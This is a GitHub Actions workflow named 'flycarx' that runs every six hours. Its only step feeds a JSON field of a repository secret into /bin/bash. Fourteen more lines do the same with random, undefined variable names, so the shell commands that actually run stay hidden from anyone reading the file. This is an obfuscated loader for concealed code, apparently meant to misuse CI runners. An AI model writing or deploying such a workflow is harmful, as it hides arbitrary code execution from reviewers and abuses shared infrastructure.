name: flycarx
on:
  workflow_dispatch:
  schedule:
    - cron: '33 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: flycarx
        env:
          cw7: ${{ secrets.cw7 }}
        run: |
          echo $cw7 | jq -r .m149 | /bin/bash
          echo $cllt26743 | jq -r .j9 | /bin/bash
          echo $xt9474 | jq -r .x16 | /bin/bash
          echo $wrywh6265 | jq -r .oyy4536 | /bin/bash
          echo $ml2 | jq -r .t917 | /bin/bash
          echo $l64472 | jq -r .e13 | /bin/bash
          echo $nla7 | jq -r .u02 | /bin/bash
          echo $nccgl0289 | jq -r .xje0 | /bin/bash
          echo $q45644 | jq -r .ka13 | /bin/bash
          echo $s84399 | jq -r .q73 | /bin/bash
          echo $p3 | jq -r .nnsis1 | /bin/bash
          echo $zzob45 | jq -r .cly060 | /bin/bash
          echo $jiwk1 | jq -r .uhtvw86008 | /bin/bash
          echo $jjxu17454 | jq -r .yb106 | /bin/bash
          echo $seen14 | jq -r .vmla466 | /bin/bash

